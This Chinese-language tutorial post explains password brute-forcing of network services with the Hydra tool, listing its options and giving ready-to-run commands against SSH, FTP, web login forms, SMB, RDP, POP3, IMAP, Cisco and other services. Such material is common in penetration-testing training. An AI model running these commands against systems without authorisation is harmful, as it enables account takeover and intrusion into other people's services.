1. 程式人生 > >8.使用hydra對端口進行爆破

8.使用hydra對端口進行爆破

info 錯誤 最大 mys xss mssq http clas ont

如果對開啟端口的服務不清楚,請看我之前寫的文章:https://www.cnblogs.com/bmjoker/p/8833316.html

2018,網站的防護(sql,xss...)的安全保護也已經上升了一個等級,但是由於管理員的安全意識薄弱,網站弱口令漏洞依然猖獗,不信可以看補天的漏洞提交記錄,弱口令依然是漏洞中的佼佼者,當然弱口令並不僅限於網站的後臺登陸弱口令,還有端口,比如 Ftp:21,ssh:22,Telnet:23,Pop3:110,3389遠程登陸,8080中間件Tomcat,7001中間件Weblogic,3306 Mysql數據庫(phpmyadmin),1433 SQLServer數據庫,5432 Postgresql數據庫...

端口掃描不用多講,鄙人還是覺得nmap好一點,但是如何批量掃的話,丟包率可能高一點。

對於端口的爆破,首先要有一個好的字典,然後再有一個好的工具,工具的話,python腳本,超級弱口令檢測工具....這裏主要介紹kali裏面hydra的爆破,應為hydra支持幾乎所有協議的在線密碼破解,並且容錯率好,不過能不能爆破成功還是需要你有一個好的字典。

---------------------------------------------------------------

技術分享圖片

語法:

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

參數詳解:

-R   根據上一次進度繼續破解
-S   使用SSL協議連接
-s   指定端口
-l   指定用戶名
-L   指定用戶名字典(文件)
-p   指定密碼破解
-P   指定密碼字典(文件)
-e   空密碼探測和指定用戶密碼探測(ns)
-M <FILE>指定目標列表文件一行一條
-f 在使用-M參數以後,找到第一對登錄名或者密碼的時候中止破解。 -C 用戶名可以用:分割(username:password)可以代替-l username -p password -o <FILE>輸出文件 -t 指定多線程數量,默認為16個線程
-w TIME 設置最大超時的時間,單位秒,默認是30s -vV 顯示詳細過程 server 目標IP service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2......)

使用案例:

爆破 ssh:22 端口命令:

hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh

爆破 Ftp:21 端口命令(指定用戶名為root)

hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp

get方式提交,破解web登錄(指定用戶名為admin)

hydra -L user.txt -p password.txt -t 線程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 線程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登錄:

hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。

破解https:

hydra -m /index.php -l admin -P password.txt 192.168.0.132 https

破解teamspeak:

hydra -l admin -P passworrd.txt -s 端口號 -vV 192.168.0.132 teamspeak

破解cisco:

hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable

破解smb:

hydra -l administrator -P password.txt 192.168.0.132 smb

破解pop3:

hydra -l root -P password.txt my.pop3.mail pop3

破解rdp(3389端口):

hydra 192.168.0.132 rdp -l administrator -P password.txt -V

破解http-proxy:

hydra -l admin -P passwprd.txt http-proxy://192.168.0.132

破解imap:

hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

就先介紹到這裏~~~

8.使用hydra對端口進行爆破